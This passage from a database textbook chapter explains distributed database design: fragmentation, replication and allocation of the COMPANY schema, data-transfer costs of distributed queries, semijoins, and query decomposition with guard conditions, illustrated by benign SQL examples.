can be executed at the various sites. Interaction between an application server and
database server might proceed as follows during the processing of an SQL query:

1. The application server formulates a user query based on input from the
client layer and decomposes it into a number of independent site queries.
Each site query is sent to the appropriate database server site.

2. Each database server processes the local query and sends the results to the
application server site. Increasingly, XML is being touted as the standard for
data exchange, so the database server may format the query result into XML
before sending it to the application server.

3. The application server combines the results of the subqueries to produce the
result of the originally required query, formats it into HTML or some other
form accepted by the client, and sends it to the client site for display.

The application server is responsible for generating a distributed execution plan for
a multisite query or transaction and for supervising distributed execution by send-
ing commands to servers. These commands include local queries and transactions
to be executed, as well as commands to transmit data to other clients or servers.
Another function controlled by the application server (or coordinator) is that of
ensuring consistency of replicated copies of a data item by employing distributed
(or global) concurrency control techniques. The application server must also ensure
the atomicity of global transactions by performing global recovery when certain
sites fail.


If the DDBMS has the capability to hide the details of data distribution from the
application server, then it enables the application server to execute global queries
and transactions as though the database were centralized, without having to specify
the sites at which the data referenced in the query or transaction resides. This prop-
erty is called distribution transparency. Some DDBMSs do not provide distribu-
tion transparency, instead requiring that applications be aware of the details of data
distribution.

4 Data Fragmentation, Replication,
and Allocation Techniques for Distributed
Database Design

In this section we discuss techniques that are used to break up the database into log-
ical units, called fragments, which may be assigned for storage at the various sites.
We also discuss the use of data replication, which permits certain data to be stored
in more than one site, and the process of allocating fragments—or replicas of frag-
ments—for storage at the various sites. These techniques are used during the
process of distributed database design. The information concerning data fragmen-
tation, allocation, and replication is stored in a global directory that is accessed by
the DDBS applications as needed.

4.1 Data Fragmentation
In a DDB, decisions must be made regarding which site should be used to store
which portions of the database. For now, we will assume that there is no replication;
that is, each relation—or portion of a relation—is stored at one site only. We discuss
replication and its effects later in this section. We also use the terminology of rela-
tional databases, but similar concepts apply to other data models. We assume that
we are starting with a relational database schema and must decide on how to dis-
tribute the relations over the various sites. To illustrate our discussion, we use the
relational database schema in Figure A.1.

Before we decide on how to distribute the data, we must determine the logical units
of the database that are to be distributed. The simplest logical units are the relations
themselves; that is, each whole relation is to be stored at a particular site. In our
example, we must decide on a site to store each of the relations EMPLOYEE,
DEPARTMENT, PROJECT, WORKS_ON, and DEPENDENT in Figure A.1. In many
cases, however, a relation can be divided into smaller logical units for distribution.
For example, consider the company database shown in Figure A.2, and assume there
are three computer sites—one for each department in the company.6

We may want to store the database information relating to each department at the
computer site for that department. A technique called horizontal fragmentation can
be used to partition each relation by department.

6Of course, in an actual situation, there will be many more tuples in the relation than those shown in
Figure A.2.


Horizontal Fragmentation. A horizontal fragment of a relation is a subset of
the tuples in that relation. The tuples that belong to the horizontal fragment are
specified by a condition on one or more attributes of the relation. Often, only a sin-
gle attribute is involved. For example, we may define three horizontal fragments on
the EMPLOYEE relation in Figure A.2 with the following conditions: (Dno = 5),
(Dno = 4), and (Dno = 1)—each fragment contains the EMPLOYEE tuples working
for a particular department. Similarly, we may define three horizontal fragments
for the PROJECT relation, with the conditions (Dnum = 5), (Dnum = 4), and
(Dnum = 1)—each fragment contains the PROJECT tuples controlled by a particu-
lar department. Horizontal fragmentation divides a relation horizontally by
grouping rows to create subsets of tuples, where each subset has a certain logical
meaning. These fragments can then be assigned to different sites in the distributed
system. Derived horizontal fragmentation applies the partitioning of a primary
relation (DEPARTMENT in our example) to other secondary relations (EMPLOYEE
and PROJECT in our example), which are related to the primary via a foreign key.
This way, related data between the primary and the secondary relations gets frag-
mented in the same way.
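In SQL terms, such horizontal fragments could be sketched as simple selections on the
COMPANY tables of Figure A.1. The view names below are purely illustrative (an actual
DDBMS would use its own fragment-definition facilities rather than ordinary views):

-- Each horizontal fragment of EMPLOYEE holds the tuples of one department
CREATE VIEW EMP_D5 AS SELECT * FROM EMPLOYEE WHERE Dno = 5;
CREATE VIEW EMP_D4 AS SELECT * FROM EMPLOYEE WHERE Dno = 4;
CREATE VIEW EMP_D1 AS SELECT * FROM EMPLOYEE WHERE Dno = 1;

-- The PROJECT fragments are defined analogously on the controlling department
CREATE VIEW PROJ_D5 AS SELECT * FROM PROJECT WHERE Dnum = 5;
CREATE VIEW PROJ_D4 AS SELECT * FROM PROJECT WHERE Dnum = 4;
CREATE VIEW PROJ_D1 AS SELECT * FROM PROJECT WHERE Dnum = 1;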

Vertical Fragmentation. Each site may not need all the attributes of a relation,
which would indicate the need for a different type of fragmentation. Vertical frag-
mentation divides a relation “vertically” by columns. A vertical fragment of a rela-
tion keeps only certain attributes of the relation. For example, we may want to
fragment the EMPLOYEE relation into two vertical fragments. The first fragment
includes personal information—Name, Bdate, Address, and Sex—and the second
includes work-related information—Ssn, Salary, Super_ssn, and Dno. This vertical
fragmentation is not quite proper, because if the two fragments are stored sepa-
rately, we cannot put the original employee tuples back together, since there is no
common attribute between the two fragments. It is necessary to include the primary
key or some candidate key attribute in every vertical fragment so that the full rela-
tion can be reconstructed from the fragments. Hence, we must add the Ssn attribute
to the personal information fragment.
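As a sketch in SQL, again using illustrative view names and the actual EMPLOYEE
attributes of Figure A.1 (the Name attribute mentioned above corresponds to Fname,
Minit, and Lname), the two vertical fragments could be written as:

-- Personal information fragment; Ssn is repeated so that EMPLOYEE can be reconstructed
CREATE VIEW EMP_PERSONAL AS
SELECT Ssn, Fname, Minit, Lname, Bdate, Address, Sex FROM EMPLOYEE;

-- Work-related information fragment
CREATE VIEW EMP_WORK AS
SELECT Ssn, Salary, Super_ssn, Dno FROM EMPLOYEE;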

Notice that each horizontal fragment on a relation R can be specified in the rela-
tional algebra by a σCi(R) operation. A set of horizontal fragments whose conditions
C1, C2, …, Cn include all the tuples in R—that is, every tuple in R satisfies (C1 OR C2
OR … OR Cn)—is called a complete horizontal fragmentation of R. In many cases
a complete horizontal fragmentation is also disjoint; that is, no tuple in R satisfies
(Ci AND Cj) for any i ≠ j. Our two earlier examples of horizontal fragmentation for
the EMPLOYEE and PROJECT relations were both complete and disjoint. To recon-
struct the relation R from a complete horizontal fragmentation, we need to apply the
UNION operation to the fragments.
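For instance, assuming the illustrative EMP_D5, EMP_D4, and EMP_D1 fragments sketched
earlier, the EMPLOYEE relation could be reconstructed with a union; UNION ALL suffices
here because the fragments are disjoint:

SELECT * FROM EMP_D5
UNION ALL
SELECT * FROM EMP_D4
UNION ALL
SELECT * FROM EMP_D1;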

A vertical fragment on a relation R can be specified by a πLi(R) operation in the
relational algebra. A set of vertical fragments whose projection lists L1, L2, …, Ln include
all the attributes in R but share only the primary key attribute of R is called a
complete vertical fragmentation of R. In this case the projection lists satisfy the fol-
lowing two conditions:

■ L1 ∪ L2 ∪ … ∪ Ln = ATTRS(R).
■ Li ∩ Lj = PK(R) for any i ≠ j, where ATTRS(R) is the set of attributes of R and
PK(R) is the primary key of R.

To reconstruct the relation R from a complete vertical fragmentation, we apply the
OUTER UNION operation to the vertical fragments (assuming no horizontal frag-
mentation is used). Notice that we could also apply a FULL OUTER JOIN operation
and get the same result for a complete vertical fragmentation, even when some hor-
izontal fragmentation may also have been applied. The two vertical fragments of the
EMPLOYEE relation with projection lists L1 = {Ssn, Name, Bdate, Address, Sex} and
L2 = {Ssn, Salary, Super_ssn, Dno} constitute a complete vertical fragmentation of
EMPLOYEE.
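A sketch of this reconstruction in SQL, using the illustrative EMP_PERSONAL and
EMP_WORK fragments defined earlier, is a full outer join on the shared key Ssn (because
the fragmentation is complete, every Ssn appears in both fragments, so an inner join
would give the same result):

SELECT P.Ssn, P.Fname, P.Minit, P.Lname, P.Bdate, P.Address, P.Sex,
       W.Salary, W.Super_ssn, W.Dno
FROM EMP_PERSONAL AS P FULL OUTER JOIN EMP_WORK AS W ON P.Ssn = W.Ssn;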

Two horizontal fragments that are neither complete nor disjoint are those defined
on the EMPLOYEE relation in Figure A.1 by the conditions (Salary > 50000) and
(Dno = 4); they may not include all EMPLOYEE tuples, and they may include com-
mon tuples. Two vertical fragments that are not complete are those defined by the
attribute lists L1 = {Name, Address} and L2 = {Ssn, Name, Salary}; these lists violate
both conditions of a complete vertical fragmentation.

Mixed (Hybrid) Fragmentation. We can intermix the two types of fragmenta-
tion, yielding a mixed fragmentation. For example, we may combine the horizon-
tal and vertical fragmentations of the EMPLOYEE relation given earlier into a
mixed fragmentation that includes six fragments. In this case, the original relation
can be reconstructed by applying UNION and OUTER UNION (or OUTER JOIN)
operations in the appropriate order. In general, a fragment of a relation R can be
specified by a SELECT-PROJECT combination of operations πL(σC(R)). If
C = TRUE (that is, all tuples are selected) and L ≠ ATTRS(R), we get a vertical frag-
ment, and if C ≠ TRUE and L = ATTRS(R), we get a horizontal fragment. Finally, if
C ≠ TRUE and L ≠ ATTRS(R), we get a mixed fragment. Notice that a relation can
itself be considered a fragment with C = TRUE and L = ATTRS(R). In the following
discussion, the term fragment is used to refer to a relation or to any of the preced-
ing types of fragments.
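As an illustration, the mixed fragment πL(σC(EMPLOYEE)) with C = (Dno = 5) and
L = {Fname, Minit, Lname, Ssn, Salary, Super_ssn, Dno} (essentially the EMPD_5
fragment that appears later in Figure 8) corresponds to the following SQL sketch:

-- Selection condition C in the WHERE clause, projection list L in the SELECT clause
SELECT Fname, Minit, Lname, Ssn, Salary, Super_ssn, Dno
FROM EMPLOYEE
WHERE Dno = 5;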

A fragmentation schema of a database is a definition of a set of fragments that
includes all attributes and tuples in the database and satisfies the condition that the
whole database can be reconstructed from the fragments by applying some
sequence of OUTER UNION (or OUTER JOIN) and UNION operations. It is also
sometimes useful—although not necessary—to have all the fragments be disjoint
except for the repetition of primary keys among vertical (or mixed) fragments. In
the latter case, all replication and distribution of fragments is clearly specified at a
subsequent stage, separately from fragmentation.

An allocation schema describes the allocation of fragments to sites of the DDBS;
hence, it is a mapping that specifies for each fragment the site(s) at which it is

896

Distributed Databases

stored. If a fragment is stored at more than one site, it is said to be replicated. We
discuss data replication and allocation next.

4.2 Data Replication and Allocation
Replication is useful in improving the availability of data. The most extreme case is
replication of the whole database at every site in the distributed system, thus creating a
fully replicated distributed database. This can improve availability remarkably
because the system can continue to operate as long as at least one site is up. It also
improves performance of retrieval for global queries because the results of such
queries can be obtained locally from any one site; hence, a retrieval query can be
processed at the local site where it is submitted, if that site includes a server module.
The disadvantage of full replication is that it can slow down update operations drasti-
cally, since a single logical update must be performed on every copy of the database to
keep the copies consistent. This is especially true if many copies of the database exist.
Full replication makes the concurrency control and recovery techniques more expen-
sive than they would be if there was no replication, as we will see in Section 7.

The other extreme from full replication involves having no replication—that is,
each fragment is stored at exactly one site. In this case, all fragments must be dis-
joint, except for the repetition of primary keys among vertical (or mixed) frag-
ments. This is also called nonredundant allocation.

Between these two extremes, we have a wide spectrum of partial replication of the
data—that is, some fragments of the database may be replicated whereas others may
not. The number of copies of each fragment can range from one up to the total num-
ber of sites in the distributed system. A special case of partial replication occurs
commonly in applications where mobile workers—such as sales forces, financial plan-
ners, and claims adjustors—carry partially replicated databases with them on laptops
and PDAs and synchronize them periodically with the server database.7 A descrip-
tion of the replication of fragments is sometimes called a replication schema.

Each fragment—or each copy of a fragment—must be assigned to a particular site
in the distributed system. This process is called data distribution (or data alloca-
tion). The choice of sites and the degree of replication depend on the performance
and availability goals of the system and on the types and frequencies of transactions
submitted at each site. For example, if high availability is required, transactions can
be submitted at any site, and most transactions are retrieval only, a fully replicated
database is a good choice. However, if certain transactions that access particular
parts of the database are mostly submitted at a particular site, the corresponding set
of fragments can be allocated at that site only. Data that is accessed at multiple sites
can be replicated at those sites. If many updates are performed, it may be useful to
limit replication. Finding an optimal or even a good solution to distributed data
allocation is a complex optimization problem.

7For a proposed scalable approach to synchronize partially replicated databases, see Mahajan et al.
(1998).


4.3 Example of Fragmentation, Allocation, and Replication
We now consider an example of fragmenting and distributing the company data-
base in Figures A.1 and A.2. Suppose that the company has three computer sites—
one for each current department. Sites 2 and 3 are for departments 5 and 4,
respectively. At each of these sites, we expect frequent access to the EMPLOYEE and
PROJECT information for the employees who work in that department and the proj-
ects controlled by that department. Further, we assume that these sites mainly access
the Name, Ssn, Salary, and Super_ssn attributes of EMPLOYEE. Site 1 is used by com-
pany headquarters and accesses all employee and project information regularly, in
addition to keeping track of DEPENDENT information for insurance purposes.

According to these requirements, the whole database in Figure A.2 can be stored at
site 1. To determine the fragments to be replicated at sites 2 and 3, first we can hori-
zontally fragment DEPARTMENT by its key Dnumber. Then we apply derived frag-
mentation to the EMPLOYEE, PROJECT, and DEPT_LOCATIONS relations based on
their foreign keys for department number—called Dno, Dnum, and Dnumber, respec-
tively, in Figure A.1. We can vertically fragment the resulting EMPLOYEE fragments
to include only the attributes {Name, Ssn, Salary, Super_ssn, Dno}. Figure 8 shows the
mixed fragments EMPD_5 and EMPD_4, which include the EMPLOYEE tuples satis-
fying the conditions Dno = 5 and Dno = 4, respectively. The horizontal fragments of
PROJECT, DEPARTMENT, and DEPT_LOCATIONS are similarly fragmented by
department number. All these fragments—stored at sites 2 and 3—are replicated
because they are also stored at headquarters—site 1.

We must now fragment the WORKS_ON relation and decide which fragments of
WORKS_ON to store at sites 2 and 3. We are confronted with the problem that no
attribute of WORKS_ON directly indicates the department to which each tuple
belongs. In fact, each tuple in WORKS_ON relates an employee e to a project P. We
could fragment WORKS_ON based on the department D in which e works or based
on the department D′ that controls P. Fragmentation becomes easy if we have a con-
straint stating that D = D′ for all WORKS_ON tuples—that is, if employees can work
only on projects controlled by the department they work for. However, there is no
such constraint in our database in Figure A.2. For example, the WORKS_ON tuple
<333445555, 10, 10.0> relates an employee who works for department 5 with a
project controlled by department 4. In this case, we could fragment WORKS_ON
based on the department in which the employee works (which is expressed by the
condition C) and then fragment further based on the department that controls the
projects that employee is working on, as shown in Figure 9.
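For instance, fragment G1 of Figure 9 (WORKS_ON tuples of department 5 employees
working on department 5 projects) corresponds to a selection such as the following
sketch; the remaining fragments G2 through G9 differ only in the department numbers
used in the two subqueries:

SELECT W.Essn, W.Pno, W.Hours
FROM WORKS_ON W
WHERE W.Essn IN (SELECT Ssn FROM EMPLOYEE WHERE Dno = 5)
AND W.Pno IN (SELECT Pnumber FROM PROJECT WHERE Dnum = 5);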

In Figure 9, the union of fragments G1, G2, and G3 gives all WORKS_ON tuples for
employees who work for department 5. Similarly, the union of fragments G4, G5,
and G6 gives all WORKS_ON tuples for employees who work for department 4. On
the other hand, the union of fragments G1, G4, and G7 gives all WORKS_ON tuples
for projects controlled by department 5. The condition for each of the fragments G1
through G9 is shown in Figure 9. The relations that represent M:N relationships,
such as WORKS_ON, often have several possible logical fragmentations. In our
distribution in Figure 8, we choose to include all fragments that can be joined to
either an EMPLOYEE tuple or a PROJECT tuple at sites 2 and 3. Hence, we place the
union of fragments G1, G2, G3, G4, and G7 at site 2 and the union of fragments G4,
G5, G6, G2, and G8 at site 3. Notice that fragments G2 and G4 are replicated at both
sites. This allocation strategy permits the join between the local EMPLOYEE or
PROJECT fragments at site 2 or site 3 and the local WORKS_ON fragment to be
performed completely locally. This clearly demonstrates how complex the problem of
database fragmentation and allocation is for large databases. The Selected Bibliography
at the end of this chapter discusses some of the work done in this area.

Figure 8
Allocation of fragments to sites. (a) Relation fragments at site 2 corresponding to
department 5 (EMPD_5, DEP_5, DEP_5_LOCS, PROJS_5, WORKS_ON_5). (b) Relation
fragments at site 3 corresponding to department 4 (EMPD_4, DEP_4, DEP_4_LOCS,
PROJS_4, WORKS_ON_4).

Figure 9
Complete and disjoint fragments of the WORKS_ON relation. (a) Fragments of WORKS_ON
for employees working in department 5 (C = [Essn in (SELECT Ssn FROM EMPLOYEE
WHERE Dno=5)]). (b) Fragments of WORKS_ON for employees working in department 4
(C = [Essn in (SELECT Ssn FROM EMPLOYEE WHERE Dno=4)]). (c) Fragments of
WORKS_ON for employees working in department 1 (C = [Essn in (SELECT Ssn FROM
EMPLOYEE WHERE Dno=1)]).

5 Query Processing and Optimization in
Distributed Databases

Now we give an overview of how a DDBMS processes and optimizes a query. First
we discuss the steps involved in query processing and then elaborate on the commu-
nication costs of processing a distributed query. Finally we discuss a special opera-
tion, called a semijoin, which is used to optimize some types of queries in a DDBMS.
A detailed discussion about optimization algorithms is beyond the scope of this
text. We attempt to illustrate optimization principles using suitable examples.8

5.1 Distributed Query Processing
A distributed database query is processed in stages as follows:

1. Query Mapping. The input query on distributed data is specified formally
using a query language. It is then translated into an algebraic query on global
relations. This translation is done by referring to the global conceptual
schema and does not take into account the actual distribution and replica-
tion of data. Hence, this translation is largely identical to the one performed
in a centralized DBMS. It is first normalized, analyzed for semantic errors,
simplified, and finally restructured into an algebraic query.

2. Localization. In a distributed database, fragmentation results in relations
being stored in separate sites, with some fragments possibly being replicated.
This stage maps the distributed query on the global schema to separate
queries on individual fragments using data distribution and replication
information.

3. Global Query Optimization. Optimization consists of selecting a strategy
from a list of candidates that is closest to optimal. A list of candidate queries
can be obtained by permuting the ordering of operations within a fragment
query generated by the previous stage. Time is the preferred unit for measur-
ing cost. The total cost is a weighted combination of costs such as CPU cost,
I/O costs, and communication costs. Since DDBs are connected by a net-
work, often the communication costs over the network are the most signifi-
cant. This is especially true when the sites are connected through a wide area
network (WAN).

8For a detailed discussion of optimization algorithms, see Ozsu and Valduriez (1999).


4. Local Query Optimization. This stage is common to all sites in the DDB.
The techniques are similar to those used in centralized systems.

The first three stages discussed above are performed at a central control site, while
the last stage is performed locally.

5.2 Data Transfer Costs of Distributed Query Processing
Besides the issues involved in processing and optimizing a query in a centralized
DBMS, in a distributed system, several additional factors further complicate query
processing. The first is the cost of transferring data over the network. This data
includes intermediate files that are transferred to other sites for further processing,
as well as the final result files that may have to be transferred to the site where the
query result is needed. Although these costs may not be very high if the sites are
connected via a high-performance local area network, they become quite significant
in other types of networks. Hence, DDBMS query optimization algorithms consider
the goal of reducing the amount of data transfer as an optimization criterion in
choosing a distributed query execution strategy.

We illustrate this with two simple sample queries. Suppose that the EMPLOYEE and
DEPARTMENT relations in Figure A.1 are distributed at two sites as shown in Figure
10. We will assume in this example that neither relation is fragmented. According to
Figure 10, the size of the EMPLOYEE relation is 100 * 10,000 = 10^6 bytes, and the size
of the DEPARTMENT relation is 35 * 100 = 3500 bytes. Consider the query Q: For
each employee, retrieve the employee name and the name of the department for which
the employee works. This can be stated as follows in the relational algebra:

Q: πFname,Lname,Dname(EMPLOYEE ⋈Dno=Dnumber DEPARTMENT)

The result of this query will include 10,000 records, assuming that every employee is
related to a department. Suppose that each record in the query result is 40 bytes long.

Figure 10
Example to illustrate volume of data transferred.
Site 1: EMPLOYEE (Fname, Minit, Lname, Ssn, Bdate, Address, Sex, Salary, Super_ssn, Dno);
10,000 records; each record is 100 bytes long; Ssn field is 9 bytes long; Dno field is
4 bytes long; Fname field is 15 bytes long; Lname field is 15 bytes long.
Site 2: DEPARTMENT (Dname, Dnumber, Mgr_ssn, Mgr_start_date); 100 records; each
record is 35 bytes long; Dnumber field is 4 bytes long; Mgr_ssn field is 9 bytes long;
Dname field is 10 bytes long.


The query is submitted at a distinct site 3, which is called the result site because the
query result is needed there. Neither the EMPLOYEE nor the DEPARTMENT relations
reside at site 3. There are three simple strategies for executing this distributed query:

1. Transfer both the EMPLOYEE and the DEPARTMENT relations to the result
site, and perform the join at site 3. In this case, a total of 1,000,000 + 3,500 =
1,003,500 bytes must be transferred.

2. Transfer the EMPLOYEE relation to site 2, execute the join at site 2, and send
the result to site 3. The size of the query result is 40 * 10,000 = 400,000 bytes,
so 400,000 + 1,000,000 = 1,400,000 bytes must be transferred.

3. Transfer the DEPARTMENT relation to site 1, execute the join at site 1, and
send the result to site 3. In this case, 400,000 + 3,500 = 403,500 bytes must be
transferred.

If minimizing the amount of data transfer is our optimization criterion, we should
choose strategy 3. Now consider another query Q′: For each department, retrieve the
department name and the name of the department manager. This can be stated as fol-
lows in the relational algebra:

Q′: πFname,Lname,Dname(DEPARTMENT ⋈Mgr_ssn=Ssn EMPLOYEE)
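For reference, the two algebraic queries correspond to the following SQL on the schema
of Figure A.1 (a sketch; the joins could equally be written with explicit JOIN ... ON
syntax):

-- Q: each employee's name with the name of his or her department
SELECT Fname, Lname, Dname
FROM EMPLOYEE, DEPARTMENT
WHERE Dno = Dnumber;

-- Q': each department's name with the name of its manager
SELECT Fname, Lname, Dname
FROM DEPARTMENT, EMPLOYEE
WHERE Mgr_ssn = Ssn;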

Again, suppose that the query is submitted at site 3. The same three strategies for
executing query Q apply to Q′, except that the result of Q′ includes only 100 records,
assuming that each department has a manager:

1. Transfer both the EMPLOYEE and the DEPARTMENT relations to the result
site, and perform the join at site 3. In this case, a total of 1,000,000 + 3,500 =
1,003,500 bytes must be transferred.

2. Transfer the EMPLOYEE relation to site 2, execute the join at site 2, and send
the result to site 3. The size of the query result is 40 * 100 = 4,000 bytes, so
4,000 + 1,000,000 = 1,004,000 bytes must be transferred.

3. Transfer the DEPARTMENT relation to site 1, execute the join at site 1, and
send the result to site 3. In this case, 4,000 + 3,500 = 7,500 bytes must be
transferred.

Again, we would choose strategy 3—this time by an overwhelming margin over
strategies 1 and 2. The preceding three strategies are the most obvious ones for the
case where the result site (site 3) is different from all the sites that contain files
involved in the query (sites 1 and 2). However, suppose that the result site is site 2;
then we have two simple strategies:

1. Transfer the EMPLOYEE relation to site 2, execute the query, and present the
result to the user at site 2. Here, the same number of bytes—1,000,000—
must be transferred for both Q and Q′.

2. Transfer the DEPARTMENT relation to site 1, execute the query at site 1, and
send the result back to site 2. In this case 400,000 + 3,500 = 403,500 bytes
must be transferred for Q and 4,000 + 3,500 = 7,500 bytes for Q′.


A more complex strategy, which sometimes works better than these simple strate-
gies, uses an operation called semijoin. We introduce this operation and discuss dis-
tributed execution using semijoins next.

5.3 Distributed Query Processing Using Semijoin
The idea behind distributed query processing using the semijoin operation is to
reduce the number of tuples in a relation before transferring it to another site.
Intuitively, the idea is to send the joining column of one relation R to the site where
the other relation S is located; this column is then joined with S. Following that, the
join attributes, along with the attributes required in the result, are projected out and
shipped back to the original site and joined with R. Hence, only the joining column
of R is transferred in one direction, and a subset of S with no extraneous tuples or
attributes is transferred in the other direction. If only a small fraction of the tuples
in S participate in the join, this can be quite an efficient solution to minimizing data
transfer.

To illustrate this, consider the following strategy for executing Q or Q′:

1. Project the join attributes of DEPARTMENT at site 2, and transfer them to site
1. For Q, we transfer F = πDnumber(DEPARTMENT), whose size is 4 * 100 = 400
bytes, whereas, for Q′, we transfer F′ = πMgr_ssn(DEPARTMENT), whose size is
9 * 100 = 900 bytes.

2. Join the transferred file with the EMPLOYEE relation at site 1, and transfer
the required attributes from the resulting file to site 2. For Q, we transfer
R = πDno, Fname, Lname(F ⋈Dnumber=Dno EMPLOYEE), whose size is 34 * 10,000 =
340,000 bytes, whereas, for Q′, we transfer R′ = πMgr_ssn, Fname, Lname
(F′ ⋈Mgr_ssn=Ssn EMPLOYEE), whose size is 39 * 100 = 3,900 bytes.

3. Execute the query by joining the transferred file R or R′ with DEPARTMENT,
and present the result to the user at site 2.

Using this strategy, we transfer 340,400 bytes for Q and 4,800 bytes for Q′. We lim-
ited the EMPLOYEE attributes and tuples transmitted to site 2 in step 2 to only those
that will actually be joined with a DEPARTMENT tuple in step 3. For query Q, this
turned out to include all EMPLOYEE tuples, so little improvement was achieved.
However, for Q′, only 100 out of the 10,000 EMPLOYEE tuples were needed.

The semijoin operation was devised to formalize this strategy. A semijoin operation
R ⋉A=B S, where A and B are domain-compatible attributes of R and S, respectively,
produces the same result as the relational algebra expression πR(R ⋈A=B S). In a
distributed environment where R and S reside at different sites, the semijoin is
typically implemented by first transferring F = πB(S) to the site where R resides and
then joining F with R, thus leading to the strategy discussed here.

Notice that the semijoin operation is not commutative; that is,

R ⋉ S ≠ S ⋉ R
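Standard SQL has no explicit semijoin operator, but the same effect can be obtained with
an IN (or EXISTS) subquery. For example, the semijoin EMPLOYEE ⋉Ssn=Mgr_ssn DEPARTMENT,
which keeps only the EMPLOYEE tuples that join with some DEPARTMENT tuple (that is,
the employees who manage a department), can be sketched as:

SELECT *
FROM EMPLOYEE
WHERE Ssn IN (SELECT Mgr_ssn FROM DEPARTMENT);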


5.4 Query and Update Decomposition
In a DDBMS with no distribution transparency, the user phrases a query directly in
terms of specific fragments. For example, consider another query Q: Retrieve the
names and hours per week for each employee who works on some project controlled by
department 5, which is specified on the distributed database where the relations at
sites 2 and 3 are shown in Figure 8, and those at site 1 are shown in Figure A.2, as in
our earlier example. A user who submits such a query must specify whether it refer-
ences the PROJS_5 and WORKS_ON_5 relations at site 2 (Figure 8) or the PROJECT
and WORKS_ON relations at site 1 (Figure A.2). The user must also maintain con-
sistency of replicated data items when updating a DDBMS with no replication trans-
parency.

On the other hand, a DDBMS that supports full distribution, fragmentation, and
replication transparency allows the user to specify a query or update request on the
schema in Figure A.1 just as though the DBMS were centralized. For updates, the
DDBMS is responsible for maintaining consistency among replicated items by using
one of the distributed concurrency control algorithms to be discussed in Section 7.
For queries, a query decomposition module must break up or decompose a query
into subqueries that can be executed at the individual sites. Additionally, a strategy
for combining the results of the subqueries to form the query result must be gener-
ated. Whenever the DDBMS determines that an item referenced in the query is repli-
cated, it must choose or materialize a particular replica during query execution.

To determine which replicas include the data items referenced in a query, the
DDBMS refers to the fragmentation, replication, and distribution information
stored in the DDBMS catalog. For vertical fragmentation, the attribute list for each
fragment is kept in the catalog. For horizontal fragmentation, a condition, some-
times called a guard, is kept for each fragment. This is basically a selection condition
that specifies which tuples exist in the fragment; it is called a guard because only
tuples that satisfy this condition are permitted to be stored in the fragment. For mixed
fragments, both the attribute list and the guard condition are kept in the catalog.

In our earlier example, the guard conditions for fragments at site 1 (Figure A.2) are
TRUE (all tuples), and the attribute lists are * (all attributes). For the fragments
shown in Figure 8, we have the guard conditions and attribute lists shown in Figure
11. When the DDBMS decomposes an update request, it can determine which frag-
ments must be updated by examining their guard conditions. For example, a user
request to insert a new EMPLOYEE tuple <‘Alex’, ‘B’, ‘Coleman’, ‘345671239’,
‘22-APR-64’, ‘3306 Sandstone, Houston, TX’, M, 33000, ‘987654321’, 4> would be
decomposed by the DDBMS into two insert requests: the first inserts the preceding
tuple in the EMPLOYEE fragment at site 1, and the second inserts the projected tuple
<‘Alex’, ‘B’, ‘Coleman’, ‘345671239’, 33000, ‘987654321’, 4> in the EMPD4 fragment at
site 3.
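A sketch of these two decomposed insert requests in SQL, using the EMPLOYEE attribute
order of Figure A.1 and the EMPD4 attribute list of Figure 11 (the date literal format
would depend on the particular system):

-- At site 1, into the complete EMPLOYEE fragment
INSERT INTO EMPLOYEE (Fname, Minit, Lname, Ssn, Bdate, Address, Sex,
                      Salary, Super_ssn, Dno)
VALUES ('Alex', 'B', 'Coleman', '345671239', '22-APR-64',
        '3306 Sandstone, Houston, TX', 'M', 33000, '987654321', 4);

-- At site 3, into the EMPD4 fragment (only the attributes in its attribute list)
INSERT INTO EMPD4 (Fname, Minit, Lname, Ssn, Salary, Super_ssn, Dno)
VALUES ('Alex', 'B', 'Coleman', '345671239', 33000, '987654321', 4);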

Figure 11
Guard conditions and attribute lists for fragments. (a) Site 2 fragments. (b) Site 3 fragments.

(a) EMPD5
        attribute list: Fname, Minit, Lname, Ssn, Salary, Super_ssn, Dno
        guard condition: Dno=5
    DEP5
        attribute list: * (all attributes Dname, Dnumber, Mgr_ssn, Mgr_start_date)
        guard condition: Dnumber=5
    DEP5_LOCS
        attribute list: * (all attributes Dnumber, Location)
        guard condition: Dnumber=5
    PROJS5
        attribute list: * (all attributes Pname, Pnumber, Plocation, Dnum)
        guard condition: Dnum=5
    WORKS_ON5
        attribute list: * (all attributes Essn, Pno, Hours)
        guard condition: Essn IN (πSsn (EMPD5)) OR Pno IN (πPnumber (PROJS5))

(b) EMPD4
        attribute list: Fname, Minit, Lname, Ssn, Salary, Super_ssn, Dno
        guard condition: Dno=4
    DEP4
        attribute list: * (all attributes Dname, Dnumber, Mgr_ssn, Mgr_start_date)
        guard condition: Dnumber=4
    DEP4_LOCS
        attribute list: * (all attributes Dnumber, Location)
        guard condition: Dnumber=4
    PROJS4
        attribute list: * (all attributes Pname, Pnumber, Plocation, Dnum)
        guard condition: Dnum=4
    WORKS_ON4
        attribute list: * (all attributes Essn, Pno, Hours)
        guard condition: Essn IN (πSsn (EMPD4)) OR Pno IN (πPnumber (PROJS4))

For query decomposition, the DDBMS can determine which fragments may contain
the required tuples by comparing the query condition with the guard conditions.
For example, consider the query Q: Retrieve the names and hours per
week for each employee who works on some project controlled by department 5. This
can be specified in SQL on the schema in Figure A.1 as follows:

Q: SELECT Fname, Lname, Hours
FROM EMPLOYEE, PROJECT, WORKS_ON
WHERE Dnum=5 AND Pnumber=Pno AND Essn=Ssn;


Suppose that the query is submitted at site 2, which is where the query result will be
needed. The DDBMS can determine from the guard condition on PROJS5 and
WORKS_ON5 that all tuples satisfying the conditions (Dnum = 5 AND Pnumber =
Pno) reside at site 2. Hence, it may decompose the query into the following rela-
tional algebra subqueries:

T1 ← πEssn(PROJS5 ⋈Pnumber=Pno WORKS_ON5)
T2 ← πEssn, Fname, Lname(T1 ⋈Essn=Ssn EMPLOYEE)
RESULT ← πFname, Lname, Hours(T2 * WORKS_ON5)

This decomposition can be used to execute the query by using a semijoin strategy.
The DDBMS knows from the guard conditions that PROJS5 contains exactly those
tuples satisfying (Dnum = 5) and that WORKS_ON5 contains all tuples to be joined
with PROJS5; hence, subquery T1 can be executed at site 2, and the projected column
Essn can be sent to site 1. Subquery T2 can then be executed at site 1, and the result
can be sent back to site 2, where the final query result is calculated and displayed to
the user. An alternative strategy would be to send the query Q itself to site 1, which
includes all the database tuples, where it would be executed locally and from which
the result would be sent back to site 2. The query optimizer would estimate the costs
of both strategies and would choose the one with the lower cost estimate.
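The decomposed subqueries above might be phrased in SQL roughly as follows, treating
T1 and T2 as temporary tables that are shipped between the two sites and using the
fragment names of Figure 11:

-- T1 at site 2: Essn values of employees who work on a department 5 project
SELECT DISTINCT W.Essn
FROM PROJS5 P, WORKS_ON5 W
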